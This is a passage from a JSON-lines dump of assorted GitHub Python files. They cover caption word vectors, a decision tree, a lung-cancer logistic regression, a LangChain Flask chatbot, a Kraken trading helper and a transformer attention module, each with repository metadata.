tqdm import tqdm\n\n\nTOP_K = 3\n\n\nif __name__ == '__main__':\n token_path = os.path.join(DATASET_ROOT, 'annotations', 'captions_tokens_count.pkl')\n\n if not os.path.isfile(token_path):\n captions_ann_paths = [\n os.path.join(DATASET_ROOT, 'annotations', 
'captions_train2014.json'),\n os.path.join(DATASET_ROOT, 'annotations', 'captions_val2014.json'),\n ]\n\n caption_anns = [COCO(x) for x in captions_ann_paths]\n\n captions = list()\n\n for caption_ann in caption_anns:\n anns = [x['caption'].strip().lower() for x in caption_ann.anns.values()]\n captions.extend(anns)\n\n tokenizer = NLTKWordTokenizer()\n\n tokenized = [tokenizer.tokenize(x) for x in captions]\n\n token_set = Counter()\n\n for tkns in tokenized:\n token_set.update(tkns)\n\n with open(token_path, 'wb') as fp:\n pickle.dump(token_set, fp)\n else:\n with open(token_path, 'rb') as fp:\n token_set = pickle.load(fp)\n\n token_set = set(token_set.keys())\n\n wv = gensim.downloader.load(\"word2vec-google-news-300\")\n\n vocab_set = set(wv.key_to_index.keys())\n\n vmax = wv.vectors.max()\n vmin = wv.vectors.min()\n\n tokens_in_vocab = token_set.intersection(vocab_set)\n\n tokens_not_in_vocab = token_set.difference(tokens_in_vocab)\n\n vector_dict = OrderedDict({\n '': -wv.vectors[wv.key_to_index['']],\n '': wv.vectors[wv.key_to_index['']],\n '': np.random.uniform(low=vmin/10, high=vmax/10, size=wv.vector_size),\n '': np.random.uniform(low=vmin/10, high=vmax/10, size=wv.vector_size),\n })\n\n for tkn in tqdm(tokens_in_vocab):\n vector_dict[tkn] = wv.vectors[wv.key_to_index[tkn]]\n\n lower_case_match_tokens = set([x for x in vocab_set if x.lower() in tokens_not_in_vocab])\n\n for tkn in tqdm(lower_case_match_tokens):\n vector_dict[tkn.lower()] = wv.vectors[wv.key_to_index[tkn]]\n\n tokens_not_in_vocab = tokens_not_in_vocab.difference(lower_case_match_tokens)\n\n hyphen_subset = set([x for x in tokens_not_in_vocab if '-' in x])\n\n for tkn in tqdm(hyphen_subset):\n word_list = tkn.split('-')\n vecs = list()\n\n for word in word_list:\n if word in vocab_set:\n vec = wv.vectors[wv.key_to_index[word]]\n else:\n dists = [(lev_dist(word, x), x) for x in vocab_set]\n dists.sort(key=lambda x: x[0])\n x1 = np.array([wv.vectors[wv.key_to_index[x[1]]] for x in dists[:TOP_K]])\n vec = np.mean(x1, axis=0)\n vecs.append(vec)\n\n x1 = np.array(vecs)\n vec = np.mean(x1, axis=0)\n vector_dict[tkn] = vec\n\n tokens_not_in_vocab = tokens_not_in_vocab.difference(hyphen_subset)\n\n # Very very slow: 2 seconds per token, wil take 3+ hours to run\n '''\n for tkn in tqdm(tokens_not_in_vocab):\n dists = [(lev_dist(tkn, x), x) for x in vocab_set]\n dists.sort(key=lambda x: x[0])\n x1 = np.array([wv.vectors[wv.key_to_index[x[1]]] for x in dists[:TOP_K]])\n vec = np.mean(x1, axis=0)\n vector_dict[tkn] = vec\n '''\n\n for tkn in tqdm(tokens_not_in_vocab):\n vector_dict[tkn] = np.random.uniform(low=vmin, high=vmax, size=wv.vector_size)\n\n vector_path = os.path.join(DATASET_ROOT, 'annotations', 'captions_tokens_vectors.pkl')\n\n with open(vector_path, 'wb') as fp:\n pickle.dump(vector_dict, fp)\n\n print('Done')\n","repo_name":"ag169/Image-Captioning","sub_path":"datasets/COCO_Caption_Vocab_Word2Vec.py","file_name":"COCO_Caption_Vocab_Word2Vec.py","file_ext":"py","file_size_in_byte":3784,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"70386665687","text":"import unittest\nfrom py_ezbar import ProgressBar, BarStyles, BarColors\n\n\nclass ProgressBarTestCase(unittest.TestCase):\n def setUp(self):\n self.range = range(5000)\n self.test_list = [\"a\", \"b\", \"c\", \"d\", \"e\", \"f\"]\n self.test_dict = {\n \"1\": {\n \"a\": \"b\"\n },\n \"2\": {\n \"c\": \"d\"\n },\n \"3\": {\n \"e\": \"f\"\n }\n }\n self.progress_bar = ProgressBar(show_fractions=True, 
color=BarColors.GREEN, style=BarStyles.DEFAULT)\n\n    def test_progress_bar_for_range(self):\n        for i in self.range:\n            self.progress_bar(index=i, iterable=self.range, current=i)\n\n    def test_progress_bar_for_list(self):\n        for i, v in enumerate(self.test_list):\n            self.progress_bar(index=i, iterable=self.test_list, current=v)\n\n    def test_progress_bar_for_dict(self):\n        for i, (k, v) in enumerate(self.test_dict.items()):\n            self.progress_bar(index=i, iterable=self.test_dict, current=v)\n\n\nif __name__ == '__main__':\n    unittest.main()\n","repo_name":"kdrkrgz/ez-bar","sub_path":"tests/test_progress_bar.py","file_name":"test_progress_bar.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1224340639","text":"def find_captain_room_number():\n    \"\"\"\n    Input:\n        n : number of members per group\n        list1: a list containing the room numbers of all members and the captain's room number.\n\n    each room number repeats n times, except the captain's room number.\n    --> the captain's room number appears (n-1) fewer times than the other\n        room numbers\n\n    let's call the captain's room number c; it appears only 1 time.\n    the other rooms are l1, l2, ... lk; each room repeats n times under the above conditions.\n\n    --> set(list1) = {l1, l2, ..., lk, c} is known\n    so, we can calculate sum(set1)*n == (l1 + l2 + ... + lk + c) * n\n    we can also calculate sum(list1) = (l1 + l2 + ... + lk) * n + c\n    here, due to:\n    (l1 + l2 + ... + lk) * n + c == (l1 + l2 + ... + lk + c) * n - (n-1)*c\n            |                                      |\n            V                                      V\n        sum(list1)                            sum(set1)*n\n    --> sum(list1) == sum(set1)*n - (n-1)*c\n    --> c = (sum(set1)*n - sum(list1)) / (n-1)\n    \"\"\"  # NOQA\n    n = int(input())\n    list1 = list(map(int, input().split()))\n    set1 = set(list1)\n    captain_room_numer = int((sum(set1) * n - sum(list1)) / (n - 1))\n    print(captain_room_numer)\n\n\nif __name__ == '__main__':\n    find_captain_room_number()\n","repo_name":"bacdoxuan/Hacker_Rank_Python","sub_path":"chap4_Sets/ex11_find_captain_room_number.py","file_name":"ex11_find_captain_room_number.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2789151295","text":"# Assign a string to a variable. \\t is the tab character, i.e. indent by one tab stop. \\n means a newline. \\\\ escapes to a single backslash \\. There are more, such as \\a and \\v, which escape ASCII control codes, and \\\" which escapes a double quote.\r\ntabby_cat = \"\\ti'm tabbed in.\"\r\npersian_cat = \"i'm split\\non a line.\"\r\nbackslash_cat = \"i'm \\\\ a \\\\ cat.\"\r\n\r\nfat_cat = \"\"\"\r\ni'll do a list:\r\n\\t* cat food\r\n\\t* fishies\r\n\\t* catnip\\n\\t* grass\r\n\"\"\"\r\n\r\nprint(tabby_cat)\r\nprint(persian_cat)\r\nprint(backslash_cat)\r\nprint(fat_cat)\r\n","repo_name":"xiaoshefengsheng/lpthw","sub_path":"ex10.py","file_name":"ex10.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"12626344112","text":"import numpy as np\r\nfrom typing import List\r\nfrom classifier import Classifier\r\n\r\nclass DecisionTree(Classifier):\r\n\tdef __init__(self):\r\n\t\tself.clf_name = \"DecisionTree\"\r\n\t\tself.root_node = None\r\n\r\n\tdef train(self, features: List[List[float]], labels: List[int]):\r\n\t\t# init.\r\n\t\tassert(len(features) > 0)\r\n\t\tself.feautre_dim = len(features[0])\r\n\t\tnum_cls = np.max(labels)+1\r\n\r\n\t\t# build the tree\r\n\t\tself.root_node = TreeNode(features, labels, num_cls)\r\n\t\tif self.root_node.splittable:\r\n\t\t\tself.root_node.split()\r\n\r\n\t\treturn\r\n\t\t\r\n\tdef predict(self, 
features: List[List[float]]) -> List[int]:\r\n\t\ty_pred = []\r\n\t\tfor feature in features:\r\n\t\t\ty_pred.append(self.root_node.predict(feature))\r\n\t\treturn y_pred\r\n\r\n\tdef print_tree(self, node=None, name='node 0', indent=''):\r\n\t\tif node is None:\r\n\t\t\tnode = self.root_node\r\n\t\tprint(name + '{')\r\n\t\tif node.splittable:\r\n\t\t\tprint(indent + ' split by dim {:d}'.format(node.dim_split))\r\n\t\t\tfor idx_child, child in enumerate(node.children):\r\n\t\t\t\tself.print_tree(node=child, name= ' '+name+'/'+str(idx_child), indent=indent+' ')\r\n\t\telse:\r\n\t\t\tprint(indent + ' cls', node.cls_max)\r\n\t\tprint(indent+'}')\r\n\r\n\r\nclass TreeNode(object):\r\n\tdef __init__(self, features: List[List[float]], labels: List[int], num_cls: int):\r\n\t\t# print(features)\r\n\t\t# print(labels)\r\n\t\t# print(num_cls)\r\n\t\tself.features = features\r\n\t\tself.labels = labels\r\n\t\tself.children = []\r\n\t\tself.num_cls = num_cls\r\n\r\n\t\tcount_max = 0\r\n\t\tfor label in np.unique(labels):\r\n\t\t\tif self.labels.count(label) > count_max:\r\n\t\t\t\tcount_max = labels.count(label)\r\n\t\t\t\tself.cls_max = label # majority of current node\r\n\r\n\t\tif len(np.unique(labels)) < 2:\r\n\t\t\tself.splittable = False\r\n\t\telse:\r\n\t\t\tself.splittable = True\r\n\t\tif len(self.features) ==0:\r\n\t\t\tself.splittable = False\r\n\t\telse:\r\n\t\t\tself.splittable = True\r\n\r\n\t\tself.dim_split = None # the dim of feature to be splitted\r\n\r\n\t\tself.feature_uniq_split = None # the feature to be splitted\r\n\r\n\r\n\tdef split(self):\r\n\t\tdef conditional_entropy(branches: List[List[int]]) -> float:\r\n\t\t\t'''\r\n\t\t\tbranches: C x B array, \r\n\t\t\t\t\t C is the number of classes,\r\n\t\t\t\t\t B is the number of branches\r\n\t\t\t\t\t it stores the number of\r\n\t\t\t\t\t Corresponding training samples\r\n\t\t\t\t\t eg:[[2,2],[4,0]]\r\n\t\t\t'''\r\n\t\t\t########################################################\r\n\t\t\t# TODO: compute the conditional entropy\r\n\t\t\t########################################################\r\n\t\t\tbran=np.array(branches)\r\n\t\t\teleBranch=np.sum(bran,axis=0)\r\n\t\t\tnoClasses=len(branches)\r\n\t\t\tnoBranches=len(branches[0])\r\n\t\t\ttotalattr=np.sum(eleBranch)\r\n\t\t\tval=[]\r\n\t\t\tfor i in range(0,noBranches):\r\n\t\t\t\tsum=0\r\n\t\t\t\tfor j in range(0,noClasses):\r\n\t\t\t\t\tif(branches[j][i]==0):\r\n\t\t\t\t\t\tcontinue\r\n\t\t\t\t\tsum+=(branches[j][i]/eleBranch[i])*np.log2(branches[j][i]/eleBranch[i])\r\n\t\t\t\tval.append(sum)\r\n\t\t\tvalue=0\r\n\t\t\tfor i in range(0,len(eleBranch)):\r\n\t\t\t\tvalue+=(eleBranch[i]/totalattr)*-1*val[i]\r\n\t\t\treturn value\r\n\r\n\r\n\r\n\t\tfet={}\r\n\t\tfor idx_dim in range(len(self.features[0])):\r\n\t\t\t############################################################\r\n\t\t\t# TODO: compare each split using conditional entropy\r\n\t\t\t# find the best split\r\n\t\t\t############################################################\r\n\t\t\t# print(\"hai\",idx_dim)\r\n\t\t\tlabel=self.labels[:]\r\n\t\t\tfeat = np.array(self.features)[:,idx_dim]\r\n\t\t\tkeys=np.unique(np.array(feat))\r\n\t\t\t# print(keys)\r\n\t\t\tlabuniq=np.unique(self.labels)\r\n\t\t\tret=[]\r\n\t\t\tfor i in range(len(labuniq)):\r\n\t\t\t\tret.append([])\r\n\t\t\tdim=len(keys)\r\n\t\t\tfor i in keys.tolist():\r\n\t\t\t\tindices = np.where(feat==i)[0]\r\n\t\t\t\tlab=[]\r\n\t\t\t\tfor j in indices:\r\n\t\t\t\t\tlab.append(label[j])\r\n\t\t\t\t\t# label.remove(j)\r\n\t\t\t\tunique, counts = np.unique(lab, 
return_counts=True)\r\n\t\t\t\tfor k in range(len(ret)):\r\n\t\t\t\t\tif( k in unique):\r\n\r\n\t\t\t\t\t\tret[k].append(counts[int(np.where(unique==k)[0])])\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tret[k].append(0)\r\n\t\t\t\t# print(ret)\r\n\t\t\tfet[idx_dim]=conditional_entropy(ret)\r\n\t\t# print(fet)\r\n\r\n\r\n\r\n\r\n\t\tkey=0\r\n\t\tmax=0\r\n\t\tfor i in fet:\r\n\t\t\tif(fet[i]>max):\r\n\t\t\t\tmax=fet[i]\r\n\t\t\t\tkey=i\r\n\t\tself.dim_split = key\r\n\r\n\t\t# for i in range(len(self.features[0])):\r\n\t\tfeat = np.array(self.features)[:, key]\r\n\t\tkeys = np.unique(np.array(feat))\r\n\t\tabc=[]\r\n\t\t# self.feature_uniq_split=keys.tolist()[:]\r\n\t\tfor m in keys:\r\n\t\t\tf1 = []\r\n\t\t\tlab=[]\r\n\t\t\tfor j in range(0,len(self.features)):\r\n\t\t\t\tinn=[]\r\n\t\t\t\t# for k in range(0,len(self.features[0])):\r\n\t\t\t\tif(self.features[j][self.dim_split]==m):\r\n\t\t\t\t\tinn=np.array(self.features[j]).tolist()\r\n\t\t\t\t\tlab.append(self.labels[j])\r\n\t\t\t\t\tinn.remove(m)\r\n\t\t\t\t\tif(len(inn)==0):\r\n\t\t\t\t\t\tcontinue\r\n\t\t\t\t\tf1.append(inn)\r\n\r\n\t\t\tlen1=len(np.unique(np.array(lab)))\r\n\t\t\t# if(len(f1)==0):\r\n\t\t\t\t# continue\r\n\t\t\tabc.append(m)\r\n\r\n\t\t\tself.children.append(TreeNode(features=f1,labels=lab,num_cls=len1))\r\n\t\t\t# print(m)\r\n\t\t\t# print(f1)\r\n\t\t\t# print(lab)\r\n\t\tself.feature_uniq_split=abc[:]\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\t############################################################\r\n\t\t# TODO: split the node, add child nodes\r\n\t\t############################################################\r\n\r\n\r\n\r\n\r\n\t\t# split the child nodes\r\n\t\tfor child in self.children:\r\n\t\t\tif child.splittable:\r\n\t\t\t\tchild.split()\r\n\r\n\t\treturn\r\n\r\n\tdef predict(self, feature: List[int]) -> int:\r\n\t\tif self.splittable:\r\n\t\t\t# print(feature)\r\n\t\t\t# print(self.dim_split)\r\n\t\t\t# print(self.feature_uniq_split)\r\n\t\t\tif(feature[self.dim_split] not in self.feature_uniq_split ):\r\n\t\t\t\treturn self.cls_max\r\n\t\t\tidx_child = self.feature_uniq_split.index(feature[self.dim_split])\r\n\t\t\t# print(idx_child)\r\n\t\t\t# print(self.children)\r\n\t\t\treturn self.children[idx_child].predict(feature)\r\n\t\telse:\r\n\t\t\treturn self.cls_max\r\n\r\n\r\n\r\n","repo_name":"salalithmantha/Machine-Learning","sub_path":"Assignment-3/decision_tree.py","file_name":"decision_tree.py","file_ext":"py","file_size_in_byte":5549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"71159041368","text":"###############################################################################################\n#Aim: coefs. and intercepts for the LLR models\n#Description: To determine the coefs. 
and intercepts of the\n# 1) NSCLC-specific LLR6 model\n# 2) NSCLC-specific LLR5noChemo model\n# 3) NSCLC-specific LLR2 model\n# with 10k-repeat train-test splitting (80%:20%).\n#\n#Run command, e.g.: python 08_4.NSCLC_LLRx_10k_ParamCalculate.py LLR6\n###############################################################################################\n\n\nimport sys\nimport time\nimport pandas as pd\nimport numpy as np\nimport sklearn.neighbors._base\nsys.modules['sklearn.neighbors.base'] = sklearn.neighbors._base\nfrom sklearn import linear_model\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nfrom collections import Counter\nimport copy\nfrom scipy import stats\n\n\nif __name__ == \"__main__\":\n    start_time = time.time()\n\n    CPU_num = -1\n    randomSeed = 1\n    resampleNUM = 10000\n    train_size = 0.8\n\n    phenoNA = 'Response'\n    LLRmodelNA = sys.argv[1] # 'LLR6' 'LLR5noChemo' 'LLR2'\n    if LLRmodelNA == 'LLR6':\n        featuresNA = ['TMB', 'PDL1_TPS(%)', 'Chemo_before_IO', 'Albumin', 'NLR', 'Age']\n    elif LLRmodelNA == 'LLR5noChemo':\n        featuresNA = ['TMB', 'PDL1_TPS(%)', 'Albumin', 'NLR', 'Age']\n    elif LLRmodelNA == 'LLR2':\n        featuresNA = ['TMB', 'PDL1_TPS(%)']\n    xy_colNAs = featuresNA + [phenoNA]\n\n    print('Raw data processing ...')\n    dataALL_fn = '../../02.Input/features_phenotype_allDatasets.xlsx'\n    dataChowell_Train0 = pd.read_excel(dataALL_fn, sheet_name='Chowell2015-2017', index_col=0)\n    dataChowell_Train1 = pd.read_excel(dataALL_fn, sheet_name='Chowell2018', index_col=0)\n\n    dataChowell_Train0 = pd.concat([dataChowell_Train0,dataChowell_Train1],axis=0)\n\n    dataChowell_Train0 = dataChowell_Train0.loc[dataChowell_Train0['CancerType']=='NSCLC',]\n    dataChowell_Train0 = dataChowell_Train0[xy_colNAs].dropna(axis=0)\n    dataChowell_Train = copy.deepcopy(dataChowell_Train0)\n\n    # truncate extreme values of features\n    TMB_upper = 50\n    Age_upper = 85\n    NLR_upper = 25\n    try:\n        dataChowell_Train['TMB'] = [c if c < TMB_upper else TMB_upper for c in dataChowell_Train0['TMB']]\n    except KeyError:\n        pass  # feature not used by this model variant\n    try:\n        dataChowell_Train['Age'] = [c if c < Age_upper else Age_upper for c in dataChowell_Train0['Age']]\n    except KeyError:\n        pass  # feature not used by this model variant\n    try:\n        dataChowell_Train['NLR'] = [c if c < NLR_upper else NLR_upper for c in dataChowell_Train0['NLR']]\n    except KeyError:\n        pass  # feature not used by this model variant\n    print('Patient number (training): ', dataChowell_Train0.shape[0])\n    counter = Counter(dataChowell_Train0[phenoNA]) # count examples in each class\n    pos_weight = counter[0] / counter[1] # estimate scale_pos_weight value\n    print('   Phenotype name: ', phenoNA)\n    print('   Negative/Positive samples in training set: ', pos_weight)\n\n    ############## 10000-replicate random data splitting for model training and evaluation ############\n    LR_params10000 = [[], [], [], [], []] # norm_mean, norm_std, coefs, intercepts, p-values\n    param_dict_LR6 = {'penalty': 'l1', 'C': 0.1, 'class_weight': 'balanced', 'solver': 'saga', 'random_state': randomSeed}\n\n    test_size = 1 - train_size\n    AUC_score_dict = {}\n    for resampling_i in range(resampleNUM):\n        data_train, data_test = train_test_split(dataChowell_Train, test_size=test_size, random_state=resampling_i*randomSeed,\n                                                 stratify=None) # stratify=None\n        y_train = data_train[phenoNA]\n        y_test = data_test[phenoNA]\n        x_train6LR = pd.DataFrame(data_train, columns=featuresNA)\n        x_test6LR = pd.DataFrame(data_test, columns=featuresNA)\n\n        scaler_sd = StandardScaler() # StandardScaler()\n        x_train6LR = scaler_sd.fit_transform(x_train6LR)\n        LR_params10000[0].append(list(scaler_sd.mean_))\n        
LR_params10000[1].append(list(scaler_sd.scale_))\n x_test6LR = scaler_sd.transform(x_test6LR)\n\n ############# LASSO Logistic Regression model #############\n clf = linear_model.LogisticRegression(**param_dict_LR6).fit(x_train6LR, y_train)\n LR_params10000[2].append(list(clf.coef_[0]))\n LR_params10000[3].append(list(clf.intercept_))\n\n predictions = clf.predict(x_train6LR)\n params = np.append(clf.intercept_, clf.coef_)\n newX = np.append(np.ones((len(x_train6LR), 1)), x_train6LR, axis=1)\n MSE = (sum((y_train - predictions) ** 2)) / (len(newX) - len(newX[0]))\n var_b = MSE * (np.linalg.inv(np.dot(newX.T, newX)).diagonal())\n sd_b = np.sqrt(var_b)\n ts_b = params / sd_b\n p_values = [2 * (1 - stats.t.cdf(np.abs(i), (len(newX) - len(newX[0])))) for i in ts_b]\n LR_params10000[4].append(p_values[1:] + [p_values[0]])\n\n fnOut = open('../../03.Results/16features/NSCLC/NSCLC_'+LLRmodelNA+'_10k_ParamCalculate.txt', 'w', buffering=1)\n for i in range(5):\n LR_params10000[i] = list(zip(*LR_params10000[i]))\n LR_params10000[i] = [np.mean(c) for c in LR_params10000[i]]\n print('coef : ', [round(c,4) for c in LR_params10000[2]])\n print('intercept: ', [round(c,4) for c in LR_params10000[3]])\n print('p_val: ', [round(c, 4) for c in LR_params10000[4]])\n fnOut.write('LLR_mean\\t' + '\\t'.join([str(c) for c in LR_params10000[0]]) + '\\n')\n fnOut.write('LLR_scale\\t' + '\\t'.join([str(c) for c in LR_params10000[1]]) + '\\n')\n fnOut.write('LLR_coef\\t' + '\\t'.join([str(c) for c in LR_params10000[2]]) + '\\n')\n fnOut.write('LLR_intercept\\t' + '\\t'.join([str(c) for c in LR_params10000[3]]) + '\\n')\n fnOut.write('LLR_pval\\t' + '\\t'.join([str(c) for c in LR_params10000[4]]) + '\\n')\n fnOut.close()\n\n print('All done! Time used: ', time.time() - start_time)","repo_name":"rootchang/ICBpredictor","sub_path":"code/08_4.NSCLC_LLRx_10k_ParamCalculate.py","file_name":"08_4.NSCLC_LLRx_10k_ParamCalculate.py","file_ext":"py","file_size_in_byte":5834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"71012950487","text":"from flask import Flask, request\nimport os\nimport sys\n\nfrom llama_index import SimpleDirectoryReader, GPTListIndex, GPTSimpleVectorIndex\nfrom llama_index import LLMPredictor, PromptHelper\n\nfrom langchain import ConversationChain, LLMChain, PromptTemplate\nfrom langchain import OpenAI\nfrom langchain.memory import ConversationBufferWindowMemory\nfrom langchain.agents import initialize_agent, Tool\nfrom langchain.chat_models import ChatOpenAI\n\napp = Flask(__name__)\n\n## Chat tooling\n\n# llm=ChatOpenAI(temperature=0, model_name=\"gpt-3.5-turbo\", max_tokens=1024)\nllm=OpenAI(temperature=0, model_name=\"text-davinci-003\", max_tokens=1024)\nmemory = ConversationBufferWindowMemory(k=2, memory_key='chat_history', return_messages=True)\n\nconstitution_index = GPTSimpleVectorIndex.load_from_disk('./app/indexes/01Constitution.json')\nlubus_index = GPTSimpleVectorIndex.load_from_disk('./app/indexes/02Lubus.json')\ncovid_index = GPTSimpleVectorIndex.load_from_disk('./app/indexes/03Covid.json')\n\ntools = [\n Tool(\n name=\"constitution_index\",\n func=lambda q: constitution_index.query(q),\n description=f\"Useful when you want answer questions about the Constitution.\",\n ),\n Tool(\n name=\"lubus_index\",\n func=lambda q: lubus_index.query(q),\n description=f\"Useful when you want answer questions about the Lubus.\",\n ),\n Tool(\n name=\"covid_index\",\n func=lambda q: covid_index.query(q),\n description=f\"Useful when you 
want answer questions about the Covid.\",\n ),\n]\n\nagent_chain = initialize_agent(tools, llm, agent=\"zero-shot-react-description\", verbose=False, memory=memory, max_iterations=6, early_stopping_method=\"generate\")\n\ndef fetch_query_data_from_openai(chat_query): # this is the home page function that generates the page code\n result = agent_chain.run(input=chat_query)\n print(result)\n # result = result.replace('\"', '\\\\\"').replace('\\n', '\\\\n')\n return result\n\n@app.route('/') # this is the home page route\ndef hello_world(): # this is the home page function that generates the page code\n return \"Hello world!\"\n\n@app.route('/chatbot') \ndef openai_api_call(): # this is the home page function that generates the page code\n chat_query = request.args.get('chat_query')\n result = fetch_query_data_from_openai(chat_query)\n return {\n \"fulfillmentText\":\n result,\n \"source\":\n \"webhookdata\"\n }\n return '200'\n\n@app.route('/webhook', methods=['POST'])\nasync def webhook():\n try:\n req = request.get_json(silent=True, force=True)\n chat_query = req.get('queryText')\n result = fetch_query_data_from_openai(chat_query)\n\n return {\n \"fulfillmentText\":\n result,\n \"source\":\n \"webhookdata\"\n }\n return '200'\n except Exception as e:\n print('error',e)\n exc_type, exc_obj, exc_tb = sys.exc_info()\n fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]\n print('oops',exc_type, fname, exc_tb.tb_lineno)\n return '400'\n\n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0', port=os.getenv(\"PORT\", default=5001))","repo_name":"gaurangAkulkarni/chatgpt","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42045322151","text":"from __future__ import annotations\nimport time\n\nfrom typing import Dict, Type\n\nfrom Structures.Asset import Asset\nimport Structures.AssetPair as AP\nfrom Structures.KrakenAPI import KrakenAPI\nfrom Structures.Error import Error, ErrorType\nimport Structures.Strategy as Strategy\n\nfrom Utils.StringManipulation import tabulate\n\nclass AssetHandler:\n\n \"\"\"\n This class is used to handle a list of assets, it keeps track of all\n the existing assets and the values associated to them.\n \"\"\"\n\n def __init__(self : AssetHandler) -> AssetHandler:\n \"\"\"\n Creates a new asset handler.\n \"\"\"\n self.assets : Dict[str, Asset] = {}\n\n # generic information about the market\n self.pairs : Dict[str, AP.AssetPair] = {}\n self.usd_pairs : Dict[str, AP.AssetPair] = {}\n\n self.log_file : str = \"logs.txt\"\n\n def update_assets(self : AssetHandler, kapi : KrakenAPI, *, asset : str = None) -> None:\n \"\"\"\n This methods updates the list of existing assets.\n\n :param kapi: The already initialized KrakenAPI.\n \"\"\"\n result = kapi.get_assets(asset=asset)\n\n if isinstance(result, Error):\n print(\"An error occurred!\")\n with open(self.log_file, \"a\") as file:\n file.write(result.error.value + \" : \" + result.msg + \"\\n\")\n if result.error == ErrorType.RATE_LIMIT:\n time.sleep(200)\n return None\n\n for asset in result:\n self.assets[asset] = Asset.build_asset(asset, result[asset])\n\n def update_tradable_assets(self : AssetHandler, kapi : KrakenAPI, *, pair : str = None) -> None:\n \"\"\"\n This methods updates the list of existing tradable assets.\n It does not update the Assets, their value in the trade whatsoever.\n\n :param kapi: The already initialized KrakenAPI.\n \"\"\"\n 
result = kapi.get_tradable_assets(pair=pair)\n\n if isinstance(result, Error):\n print(\"An error occurred!\")\n with open(self.log_file, \"a\") as file:\n file.write(result.error.value + \" : \" + result.msg + \"\\n\")\n if result.error == ErrorType.RATE_LIMIT:\n time.sleep(200)\n return None\n\n for pair in result:\n self.pairs[pair] = AP.AssetPair.build_asset_pair(pair, self, result[pair])\n\n if (self.pairs[pair].base.name == \"ZUSD\" or\n self.pairs[pair].quote.name == \"ZUSD\" or\n self.pairs[pair].quote.name == \"USD\" or\n self.pairs[pair].base.name == \"USD\"):\n\n self.usd_pairs[pair] = self.pairs[pair]\n\n def update_usd_tradable_prices(self : AssetHandler, kapi : KrakenAPI, *, pair : str = None, total : int = -1) -> None:\n \"\"\"\n Updates the value of the trades of tradable USD assets.\n\n :param kapi: The already initialized KrakenAPI.\n \"\"\"\n if pair != None:\n result = kapi.public_kraken_request(f\"https://api.kraken.com/0/public/OHLC?pair={pair}&interval=5\")\n\n if isinstance(result, Error):\n print(\"An error occurred!\")\n with open(self.log_file, \"a\") as file:\n file.write(str(result.error.value) + \" : \" + str(result.msg) + \"\\n\")\n if result.error == ErrorType.RATE_LIMIT:\n time.sleep(200)\n return None\n\n self.pairs[pair].update_prices(result[pair])\n self.pairs[pair].update_data(self.pairs[pair].quote.name != \"ZUSD\" and self.pairs[pair].quote.name != \"USD\")\n else:\n for p in self.usd_pairs:\n # print(p)\n result = kapi.public_kraken_request(f\"https://api.kraken.com/0/public/OHLC?pair={p}&interval=5\")\n\n if isinstance(result, Error):\n print(\"An error occurred!\")\n with open(self.log_file, \"a\") as file:\n file.write(result.error.value + \" : \" + result.msg + \"\\n\")\n if result.error == ErrorType.RATE_LIMIT:\n time.sleep(200)\n return None\n\n self.pairs[p].update_prices(result[p])\n self.pairs[p].update_data(self.pairs[p].quote.name != \"ZUSD\" and self.pairs[p].quote.name != \"USD\")\n\n total -= 1\n if total == 0: break\n\n def get_best_usd_pair(self : AssetHandler, bs : Type[Strategy.BuyStrategy]) -> AP.AssetPair:\n \"\"\"\n Returns the best USD pair of tradable assets.\n\n :param strategy: The strategy to apply, to decide which asset\n is best suited to be bought. 
This strategy should be a function\n        that takes as input an AssetPair object and returns a floating \n        point value.\n        \n        :returns: The best asset to buy right now.\n        \"\"\"\n        best_pair : AP.AssetPair = None\n        max_val = None\n        best_pair = None\n\n        for pair in self.usd_pairs:\n            if not self.usd_pairs[pair].is_init: continue\n            p = self.usd_pairs[pair]\n            res = bs.strategy(p)\n            \n            if max_val == None or max_val < res:\n                max_val = res if max_val == None else max(res, max_val)\n                best_pair = p\n\n        return best_pair\n\n    def __str__(self : AssetHandler) -> str:\n        s = \"Assets:\\n\"\n        for element in self.assets:\n            s += f\"Asset {self.assets[element].name}: \\n\"\n            s += tabulate(str(self.assets[element])) + \"\\n\"\n            s += \"-------------------------------------------------\\n\"\n        \n        for element in self.pairs:\n            s += f\"Asset {self.pairs[element].name}: \\n\"\n            s += tabulate(str(self.pairs[element])) + \"\\n\"\n            s += \"-------------------------------------------------\\n\"\n\n        for element in self.usd_pairs:\n            s += f\"Asset {self.usd_pairs[element].name}: \\n\"\n            s += tabulate(str(self.usd_pairs[element])) + \"\\n\"\n            s += \"-------------------------------------------------\\n\"\n\n        return s.rstrip(\"\\n\")","repo_name":"Leopounet/BotKraken","sub_path":"src/Structures/AssetHandler.py","file_name":"AssetHandler.py","file_ext":"py","file_size_in_byte":6075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22407802896","text":"import torch.nn as nn\nimport torch.nn.functional as F\n\nfrom .modules import ScaledDotProductAttention\n\nclass MultiHeadAttention(nn.Module):\n    ''' Multi-Head Attention module '''\n\n    def __init__(self, n_head, d_model, d_k, d_v, dropout=0.1):\n        super().__init__()\n\n        self.n_head = n_head\n        self.d_k = d_k\n        self.d_v = d_v\n\n        self.w_qs = nn.Linear(d_model, n_head * d_k, bias=False) # in_features=512, out_features=512\n        self.w_ks = nn.Linear(d_model, n_head * d_k, bias=False) # in_features=512, out_features=512\n        self.w_vs = nn.Linear(d_model, n_head * d_v, bias=False) # in_features=512, 